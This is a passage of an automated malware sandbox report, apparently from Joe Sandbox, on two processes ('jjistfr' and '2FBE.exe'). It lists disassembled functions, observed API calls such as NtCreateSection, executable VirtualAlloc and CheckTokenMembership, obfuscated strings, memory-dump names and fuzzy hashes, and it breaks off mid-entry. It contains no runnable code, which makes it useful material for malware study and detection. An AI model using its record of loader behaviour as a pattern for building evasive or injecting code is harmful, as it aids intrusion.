Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction ID: c9f3fcf8bcf4793f4e93774b1f3aea48b9d62e180a47635587c881d01dd95fe5
Opcode Fuzzy Hash: e590d6087ef849e6d5dc42af1f36e43da1ae6ac463b40af5ec02edc632c7ec29
Instruction Fuzzy Hash: 44118BB520C204EBEB006A949C61EBA33689B41324F308033FA537A1F1C53D9A13F66F

Function 004018FA Relevance: 1.3, APIs: 1, Instructions: 61
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction ID: b7e75c0626d3bb27724d4ec46791fa532c83bfb7d8b633e26b51f8edd18e17c4
Opcode Fuzzy Hash: 4f455529237ed37661ab323116e9dd70b25b96b1891abafaa669d2a166d89a0c
Instruction Fuzzy Hash: 8D0169F520C204EBEB006A959C61E7A32A89B40314F308433BA53791F1D57D9A13F66F

Function 00401906 Relevance: 1.3, APIs: 1, Instructions: 56
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction ID: d22cbc81ffad1bf36218d88fcd010809f3a6372a226c5372991517933d0026e7
Opcode Fuzzy Hash: f2aa24b159777525133b0c37544b8da22a58b02743232fac7b49631ece76fc28
Instruction Fuzzy Hash: B0018CB5608100EBEB005AA18861BBA33A89B55310F308537FA53791F5C53D9A13EB2F

Function 00401937 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction ID: 58f7e284f65f0deed68c1957b19a6c9fa897bc81c1ad5f596fd0fc14cb75afb8
Opcode Fuzzy Hash: 23a7989e7a2524b76de4928b01830f2bcda93d6fb81d10b9735e2ff1c3c734ba
Instruction Fuzzy Hash: 15018FB6608204E7EB005A94D861EBA32289B41321F208137FA23791F5C53D8A13E76B

Function 00401926 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction ID: 96766bc7df1ac7ff96305ad3f9c1d052b76615a330d402c70b0abf72a80acf22
Opcode Fuzzy Hash: adca0762ce3db872b76960727b6724d0b95666fb2f7ba4eb884b2811624206fc
Instruction Fuzzy Hash: 40014BB5208105E7EB006E959861EBA33689B45314F308533BA53791F1C53D8A13FB2F

Function 0259409D Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 025940EE

Memory Dump Source

Source File: 00000003.00000002.1964481125.000000000258D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0258D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_258d000_jjistfr.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 8a7bb53b2842349be0c61fac042d8543dacf5317323e5068ab9d1d655d905e8c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 7E112B79A00208EFDB01DF98C985E98BBF5AF08351F058094F948AB361D371EA90EF84

Function 0040191E Relevance: 1.3, APIs: 1, Instructions: 47
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401949

Part of subcall function 00401513: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
Part of subcall function 00401513: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD

Memory Dump Source

Source File: 00000003.00000002.1963650414.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_jjistfr.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction ID: c6131c3a50a378ccb7249bf603a143f64ac18458d27712ce8a7102c0a8bf1339
Opcode Fuzzy Hash: 5209ebee30330765688d0b4a9a44bb5409681334373931677855da3aedfd269d
Instruction Fuzzy Hash: 03011DB5208105E7EB006E95D861E7E33699B44315F308537BA53791F5C63D8A13E72F

Analysis Process: 2FBE.exePID: 6044, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23.4%
Total number of Nodes:	124
Total number of Limit Nodes:	22

Executed Functions

Function 00007FF76487E810 Relevance: 109.0, APIs: 4, Strings: 56, Instructions: 3967COMMON

Download Yara Rule

Strings

U8PB, xrefs: 00007FF7648815A2
dfb, xrefs: 00007FF7648821BC
dl!, xrefs: 00007FF76488207D
c$&o, xrefs: 00007FF7648814B8
5no, xrefs: 00007FF764880CEB
c~D+, xrefs: 00007FF7648800FF
c~D+, xrefs: 00007FF7648822B3
U8PB, xrefs: 00007FF76488100E
u|, xrefs: 00007FF764880EA9
{F"7, xrefs: 00007FF7648813AD
29K&, xrefs: 00007FF764880E60
LK@f, xrefs: 00007FF7648839C0
yl, xrefs: 00007FF76488212F
e6M , xrefs: 00007FF76488149D
d6M , xrefs: 00007FF76487FE7A
yl, xrefs: 00007FF76487FC52
e6M , xrefs: 00007FF764881082
LK@f, xrefs: 00007FF76487F1C6
cpHi, xrefs: 00007FF76487FCB2
hTw*, xrefs: 00007FF7648809E2
{3\M, xrefs: 00007FF76487EFCC
|3\M, xrefs: 00007FF76488389D
!@X, xrefs: 00007FF76487EE4F
#{j, xrefs: 00007FF76487FAB9
g1E, xrefs: 00007FF764881C28
e6M , xrefs: 00007FF76488325C
SQ>, xrefs: 00007FF764880703
xl, xrefs: 00007FF76487F138
U8PB, xrefs: 00007FF764881CC2
SQ>, xrefs: 00007FF76488309C
v'Hu, xrefs: 00007FF76487F4D5
hTw*, xrefs: 00007FF764881DE8
mF, xrefs: 00007FF76487EA08
29K&, xrefs: 00007FF764881594
b~D+, xrefs: 00007FF76487E980
5no, xrefs: 00007FF76488000D
dfb, xrefs: 00007FF7648805AA
yl, xrefs: 00007FF76487E874
u|, xrefs: 00007FF76487EBDC
U8PB, xrefs: 00007FF764881CD7
GSw', xrefs: 00007FF7648820B5
nF, xrefs: 00007FF76487F702
29K&, xrefs: 00007FF76488182C
pcR, xrefs: 00007FF76487FF14
nF, xrefs: 00007FF76488173D
cpHi, xrefs: 00007FF76488021A
!@X, xrefs: 00007FF76487FEFD
U8PB, xrefs: 00007FF76488158F
#{j, xrefs: 00007FF7648808B4
v'Hu, xrefs: 00007FF764880864
SQ>, xrefs: 00007FF7648830AD
SQ>, xrefs: 00007FF764881C5C
|3\M, xrefs: 00007FF76487F630
dl!, xrefs: 00007FF76488108E
c$&o, xrefs: 00007FF764880CDF
GSw', xrefs: 00007FF764880E6C

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: !@X$!@X$#{j$#{j$29K&$29K&$29K&$5no$5no$GSw'$GSw'$LK@f$LK@f$SQ>$SQ>$SQ>$SQ>$U8PB$U8PB$U8PB$U8PB$U8PB$b~D+$c$&o$c$&o$cpHi$cpHi$c~D+$c~D+$d6M $dfb$dfb$dl!$dl!$e6M $e6M $e6M $g1E$hTw*$hTw*$mF$nF$nF$u|$u|$v'Hu$v'Hu$xl$yl$yl$yl${3\M${F"7$|3\M$|3\M$pcR
API String ID: 0-1998008778
Opcode ID: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
Instruction ID: ef33e17c8853f050969113b7d039ad13327529e467af55fb0f8eca8aefe7283f
Opcode Fuzzy Hash: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
Instruction Fuzzy Hash: A083C721E096C7CAFB78AF2698E47FD6291BF5430CF60443AC61E4ABD4CE3C56909761

Function 00007FF7648DF310 Relevance: 3.1, APIs: 2, Instructions: 87
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.KERNELBASE ref: 00007FF7648DF3E6
CheckTokenMembership.KERNELBASE(?,?,?,?,?,?,?,?,F4EB9223,?,0645EEAE8F7DAD8E,1063196CE2D18368,?,?,00007FF76487B07B), ref: 00007FF7648DF442

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: AllocateCheckInitializeMembershipToken
String ID:
API String ID: 1663163955-0
Opcode ID: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
Instruction ID: 6c226f3ea32e6334823d8cd7d61efe73888e14cd7cbdf55cb64dbdbf770cf2ef
Opcode Fuzzy Hash: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
Instruction Fuzzy Hash: B531917660D746C6EA248F16E4A436EB7A1FB85744F500039EB8E06BA8DF3CD4499F00

Function 00007FF7648E07D0 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 589
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dT, xrefs: 00007FF7648E0A92
gFW, xrefs: 00007FF7648E0806
dT, xrefs: 00007FF7648E0C8F
dT, xrefs: 00007FF7648E0841
gFW, xrefs: 00007FF7648E0CA8
gFW, xrefs: 00007FF7648E1341

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: gFW$gFW$gFW$dT$dT$dT
API String ID: 0-1908915228
Opcode ID: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
Instruction ID: a0f2b3cc5545a8f84b26c21d41179ac6fd0267780bda01cdd92ddc98fd255743
Opcode Fuzzy Hash: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
Instruction Fuzzy Hash: 4642C132B0CBD6C5DA749B46F880BBAA791E7CAB90F504536CE8D07B94CE3CD450AB54

Function 00007FF7648C3030 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 247
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

"Yba, xrefs: 00007FF7648C3301
"Yba, xrefs: 00007FF7648C33A7
KC<., xrefs: 00007FF7648C30AC
JC<., xrefs: 00007FF7648C30A1
fkB2, xrefs: 00007FF7648C308B
gkB2, xrefs: 00007FF7648C31CB
gkB2, xrefs: 00007FF7648C34F7
KC<., xrefs: 00007FF7648C32B3

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: "Yba$"Yba$JC<.$KC<.$KC<.$fkB2$gkB2$gkB2
API String ID: 0-2770720463
Opcode ID: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
Instruction ID: 0903654503cdcba4942ee2e0d4ae3b57aaf16323e26a5736e441701fac59d44d
Opcode Fuzzy Hash: 49f70aee238b0ea9206585d699d060682330895e580896f431ba7ef4a8af642f
Instruction Fuzzy Hash: BFB1A626A0D747D5E9746F5AA0C037EE290EB45790FA00436E98DC7F94CE2DDCA28B53

Function 00007FF7648DFF60 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 308
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

-YV, xrefs: 00007FF7648E00D0
%<L,, xrefs: 00007FF7648E0147
-YV, xrefs: 00007FF7648E0055
-YV, xrefs: 00007FF7648E01C7
%<L,, xrefs: 00007FF7648E03E2

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: %<L,$%<L,$-YV$-YV$-YV
API String ID: 0-1602977039
Opcode ID: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
Instruction ID: 27b4c124333e9c4ec86afe1911b74fd095eb9c2b4c84b5c92d10b231a3305a4b
Opcode Fuzzy Hash: 6dfcfb1db61d7b2f5d834a913636764ef8b3d4bb3454400931b53537016b52b6
Instruction Fuzzy Hash: 79D12922A05B56C5EB64AF6AD8C02BD63A0FB1638CF640832EE4DD3754DF3CD5A19351

Function 00007FF7648E5870 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

+I}, xrefs: 00007FF7648E5996
+I}, xrefs: 00007FF7648E5C10

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: +I}$+I}
API String ID: 0-3898140586
Opcode ID: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
Instruction ID: e4ac144b0da04ace916cca54be1d0ed674a0ca63b4c4b251ec309f1a0ba73864
Opcode Fuzzy Hash: 838b156c67add71ea4850f9e01a76d00fa210003d949660496066f6e9b33b21c
Instruction Fuzzy Hash: B5810825E1C313C7EAB8AE9664C013EE6909BC5350FF41436ED0EC77E1CA2DE8615B29

Function 00007FF764874970 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.4[, xrefs: 00007FF764874AAB
.4[, xrefs: 00007FF764874B9B

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: .4[$ .4[
API String ID: 0-1397926279
Opcode ID: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
Instruction ID: aa5295a6f895c87c6a2afe6e5b177475097aca9216563f4c089189e7b76645d8
Opcode Fuzzy Hash: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
Instruction Fuzzy Hash: 0451F912A1AB89C5EA215F3AA4813A9E3A0BFD9794F544331EE8D52370DF3CE5D19701

Function 00007FF7648888F7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE ref: 00007FF764889314

Strings

H]c, xrefs: 00007FF7648892E6

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: LibraryLoad
String ID: H]c
API String ID: 1029625771-2876529112
Opcode ID: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
Instruction ID: cd2d0395ce3400be035b713c49d62d577eeb2b742c9267554dda6d1b3e7e81d4
Opcode Fuzzy Hash: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
Instruction Fuzzy Hash: 8151943260C687C5EE74AE5AE4D43BEA390EB84760F900632D6ADC77D4CE3CD4608B65

Function 00007FF7648C2BA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

phV, xrefs: 00007FF7648C2C17

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID: phV
API String ID: 0-1350728776
Opcode ID: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
Instruction ID: 78d2de8f99d808e796c71be9663349d5647e63388582742f918055437b7ad437
Opcode Fuzzy Hash: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
Instruction Fuzzy Hash: 5A41D225E08743C1EA705F1A94C13BD9690AB557B4FA41A32EE6DC73D0CE2CE8E05B52

Function 00007FF764876A50 Relevance: 3.3, APIs: 2, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FF764876B1D

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
Instruction ID: 37e6af22e507d0e07743277db5d6bd78e83dad03cf789e263a647356000b1f84
Opcode Fuzzy Hash: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
Instruction Fuzzy Hash: C7C1E722A0C257C6E6686E1A64E013DF650FF54760FA4613AE54FA7BD8CF2CE8E04721

Function 00007FF7648E5680 Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
Instruction ID: 427a7517aa19050418b9ff3890a530df33ba718981bf23daacdb66e0a8150aec
Opcode Fuzzy Hash: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
Instruction Fuzzy Hash: 0911602191CB46D2EA60AE46A8D012EA391BB887E4FD01532E9CDC7364CE2CD9A04A24

Function 00007FF7648E13D0 Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDlgButtonChecked.USER32 ref: 00007FF7648E13FF

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: ButtonChecked
String ID:
API String ID: 1719414920-0
Opcode ID: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
Instruction ID: 798664cfa4e867f0b55b92546301582a755dbc00c0c146c6def7511cb602e2cf
Opcode Fuzzy Hash: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
Instruction Fuzzy Hash: 74F0286270C28084EA341A22F5402799A20A79CBF8F580471ED8D43B54C91DC6818704

Function 00007FF7648E5750 Relevance: 1.5, APIs: 1, Instructions: 27
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,?,?,?,00007FF76489432B), ref: 00007FF7648E57A5

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
Instruction ID: 285ba6a4795a18d79f871e0dc06324b68d2a8331f00157c1f31e5b8dde5bbab2
Opcode Fuzzy Hash: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
Instruction Fuzzy Hash: BEF0302562DB45C5DAA89F56F8D026DB7A8F7C8790F501025FA8E83B68DF3DC4608B14

Function 00007FF7648E5620 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDeleteBoundaryDescriptor.NTDLL(1063196CE2D18368,00007FF76487B179), ref: 00007FF7648E565F

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415279102.00007FF7648ED000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.2415314453.00007FF764952000.00000004.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff764860000_2FBE.jbxd

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
Instruction ID: b220883b7dc6f5b1151555541f2afa570e8978dbc9c957543c0e4f3230162375
Opcode Fuzzy Hash: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
Instruction Fuzzy Hash: A0E0E521A0CB46C5DA609B17F480029A391B78CB90F684231DD9D83330DE2CC2924A04

Function 00007FF7648E5C40 Relevance: 1.5, APIs: 1, Instructions: 22
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL ref: 00007FF7648E5C84

Memory Dump Source

Source File: 00000006.00000002.2415236317.00007FF764861000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF764860000, based on PE: true

Associated: 00000006.00000002.2415220740.00007FF764860000.00000002.00000001.01000000.00000006.sdmpDownload File
